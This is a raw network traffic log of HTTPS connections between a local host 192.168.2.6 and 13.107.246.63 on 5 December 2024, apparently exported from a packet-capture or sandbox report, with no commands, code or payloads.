                                                                                                              Dec 5, 2024 10:38:50.382422924 CET4434982613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:50.382546902 CET49826443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:50.382546902 CET49826443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:50.382591963 CET49826443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:50.382616043 CET4434982613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:50.383434057 CET4434982513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:50.383512974 CET49825443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:50.384727955 CET49825443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:50.384727955 CET49825443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:50.384747028 CET4434982513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:50.384757042 CET4434982513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:50.392349958 CET4434982413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:50.392383099 CET4434982413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:50.392823935 CET49824443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:50.392834902 CET4434982413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:50.393471956 CET4434982413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:50.393656015 CET49824443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:50.394114971 CET49824443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:50.394128084 CET4434982413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:50.394150019 CET49824443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:50.394155979 CET4434982413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:50.409337044 CET49827443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:50.409352064 CET4434982713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:50.409383059 CET49827443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:50.409389973 CET4434982713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:50.412852049 CET49832443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:50.412904024 CET4434983213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:50.413110018 CET49832443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:50.413110018 CET49832443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:50.413145065 CET4434983213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:50.422709942 CET49834443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:50.422709942 CET49833443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:50.422729969 CET4434983413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:50.422761917 CET4434983313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:50.422837019 CET49833443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:50.422838926 CET49834443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:50.436387062 CET49833443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:50.436403990 CET4434983313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:50.460489988 CET49835443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:50.460524082 CET4434983513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:50.460578918 CET49835443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:50.461985111 CET49835443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:50.462006092 CET4434983513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:50.478605986 CET49834443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:50.478624105 CET4434983413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.130323887 CET4434983213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.131092072 CET49832443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.131112099 CET4434983213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.131609917 CET49832443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.131616116 CET4434983213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.161673069 CET4434983313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.176296949 CET4434983513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.177041054 CET49835443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.177094936 CET4434983513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.188148975 CET49833443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.188173056 CET4434983313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.188707113 CET49833443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.188713074 CET4434983313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.189160109 CET49835443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.189166069 CET4434983513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.194926977 CET4434983413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.195346117 CET49834443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.195367098 CET4434983413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.195754051 CET49834443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.195763111 CET4434983413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.566250086 CET4434983213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.569294930 CET4434983213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.569401026 CET49832443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.569478035 CET49832443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.569502115 CET4434983213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.569519043 CET49832443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.569525957 CET4434983213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.572180986 CET49836443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.572216034 CET4434983613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.572505951 CET49836443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.572810888 CET49836443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.572820902 CET4434983613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.595721006 CET4434983313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.599262953 CET4434983313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.599333048 CET49833443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.600143909 CET49833443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.600162983 CET4434983313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.600169897 CET49833443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.600177050 CET4434983313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.602727890 CET49837443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.602760077 CET4434983713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.602983952 CET49837443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.603081942 CET49837443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.603096962 CET4434983713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.610579967 CET4434983513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.614178896 CET4434983513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.614264965 CET49835443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.614375114 CET49835443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.614375114 CET49835443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.614384890 CET4434983513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.614393950 CET4434983513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.616483927 CET49838443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.616523027 CET4434983813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.617125988 CET49838443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.617265940 CET49838443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.617278099 CET4434983813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.630500078 CET4434983413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.634098053 CET4434983413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.634152889 CET49834443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.634247065 CET49834443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.634259939 CET4434983413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.634296894 CET49834443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.634303093 CET4434983413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.636157990 CET49839443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.636188984 CET4434983913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:52.636432886 CET49839443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.636574030 CET49839443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:52.636588097 CET4434983913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:53.732059956 CET4434982913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:53.732570887 CET49829443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:53.732634068 CET4434982913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:53.733105898 CET49829443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:53.733112097 CET4434982913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.166703939 CET4434982913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.166788101 CET4434982913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.166848898 CET49829443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.196307898 CET49829443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.196335077 CET4434982913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.196348906 CET49829443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.196356058 CET4434982913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.209399939 CET49840443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.209454060 CET4434984013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.209523916 CET49840443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.212920904 CET49840443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.212939978 CET4434984013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.289268017 CET4434983613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.292068958 CET49836443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.292079926 CET4434983613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.292515039 CET49836443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.292520046 CET4434983613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.318708897 CET4434983713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.320657015 CET49837443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.320673943 CET4434983713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.321346998 CET49837443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.321352959 CET4434983713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.333174944 CET4434983813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.333713055 CET49838443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.333729982 CET4434983813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.334141970 CET49838443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.334146023 CET4434983813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.355068922 CET4434983913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.355397940 CET49839443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.355415106 CET4434983913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.356086969 CET49839443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.356092930 CET4434983913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.723059893 CET4434983613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.726855993 CET4434983613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.727185965 CET49836443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.727256060 CET49836443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.727256060 CET49836443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.727286100 CET4434983613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.727298021 CET4434983613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.731514931 CET49841443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.731558084 CET4434984113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.733678102 CET49841443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.733784914 CET49841443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.733798027 CET4434984113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.753005981 CET4434983713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.756519079 CET4434983713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.756742001 CET49837443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.756778955 CET49837443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.756778955 CET49837443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.756810904 CET4434983713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.756824970 CET4434983713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.759051085 CET49842443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.759098053 CET4434984213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.759253979 CET49842443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.759397984 CET49842443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.759406090 CET4434984213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.768001080 CET4434983813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.771039963 CET4434983813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.771245003 CET49838443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.771864891 CET49838443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.771879911 CET4434983813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.771966934 CET49838443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.771974087 CET4434983813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.775513887 CET49843443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.775542974 CET4434984313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.775712013 CET49843443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.775712013 CET49843443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.775737047 CET4434984313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.789016008 CET4434983913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.792507887 CET4434983913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.792567015 CET4434983913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.792598963 CET49839443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.795628071 CET49839443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.795628071 CET49839443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.795706034 CET49839443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.795720100 CET4434983913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.797722101 CET49844443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.797744989 CET4434984413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:54.799721003 CET49844443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.799721956 CET49844443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:54.799751043 CET4434984413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:55.933547974 CET4434984013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:55.933998108 CET49840443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:55.934031963 CET4434984013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:55.934568882 CET49840443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:55.934576988 CET4434984013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.368005991 CET4434984013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.371428013 CET4434984013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.371490955 CET49840443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.371536016 CET49840443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.371560097 CET4434984013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.371578932 CET49840443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.371584892 CET4434984013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.374870062 CET49845443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.374910116 CET4434984513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.375001907 CET49845443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.375150919 CET49845443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.375159979 CET4434984513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.449656963 CET4434984113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.450246096 CET49841443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.450268030 CET4434984113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.451517105 CET49841443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.451523066 CET4434984113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.477816105 CET4434984213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.478404999 CET49842443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.478437901 CET4434984213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.478880882 CET49842443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.478889942 CET4434984213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.490094900 CET4434984313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.490995884 CET49843443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.491014957 CET4434984313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.491420031 CET49843443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.491425037 CET4434984313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.515248060 CET4434984413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.516136885 CET49844443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.516136885 CET49844443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.516158104 CET4434984413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.516175032 CET4434984413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.883613110 CET4434984113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.887244940 CET4434984113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.887295008 CET4434984113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.887458086 CET49841443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.888020039 CET49841443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.888034105 CET4434984113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.891860962 CET49846443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.891895056 CET4434984613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.893779039 CET49846443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.899802923 CET49846443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.899820089 CET4434984613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.911716938 CET4434984213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.915385962 CET4434984213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.915494919 CET49842443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.915543079 CET49842443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.915563107 CET4434984213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.915595055 CET49842443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.915601015 CET4434984213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.924066067 CET4434984313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.925364017 CET49847443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.925403118 CET4434984713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.925538063 CET49847443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.925677061 CET49847443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.925694942 CET4434984713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.927800894 CET4434984313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.927933931 CET49843443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.930305958 CET49843443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.930306911 CET49843443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.930326939 CET4434984313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.930336952 CET4434984313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.932326078 CET49848443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.932372093 CET4434984813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.932555914 CET49848443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.932693005 CET49848443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.932708979 CET4434984813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.950628996 CET4434984413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.953742981 CET4434984413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.953829050 CET49844443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.953829050 CET49844443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.953978062 CET49844443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.953993082 CET4434984413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.955931902 CET49849443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.955976009 CET4434984913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:56.956084013 CET49849443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.956196070 CET49849443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:56.956212044 CET4434984913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:58.089473963 CET4434984513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:58.107815981 CET49845443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:58.107840061 CET4434984513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:58.108331919 CET49845443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:58.108339071 CET4434984513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:58.529366016 CET4434984513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:58.532521963 CET4434984513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:58.532578945 CET4434984513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:58.532615900 CET49845443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:58.532680035 CET49845443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:58.532881021 CET49845443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:58.532881021 CET49845443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:58.532896996 CET4434984513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:58.532905102 CET4434984513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:58.538662910 CET49850443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:58.538716078 CET4434985013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:58.538873911 CET49850443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:58.548964024 CET49850443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:58.548988104 CET4434985013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:58.616714001 CET4434984613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:58.617969036 CET49846443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:58.617979050 CET4434984613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:58.618310928 CET49846443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:58.618315935 CET4434984613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:58.641607046 CET4434984713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:58.642286062 CET49847443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:58.642297983 CET4434984713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:58.642796993 CET49847443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:58.642802954 CET4434984713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:58.652352095 CET4434984813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:58.652874947 CET49848443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:58.652931929 CET4434984813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:58.653522968 CET49848443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:58.653542042 CET4434984813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:58.670023918 CET4434984913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:58.670454025 CET49849443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:58.670475960 CET4434984913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:58.673604965 CET49849443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:38:58.673610926 CET4434984913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:38:59.295826912 CET4434984613.107.246.63192.168.2.6
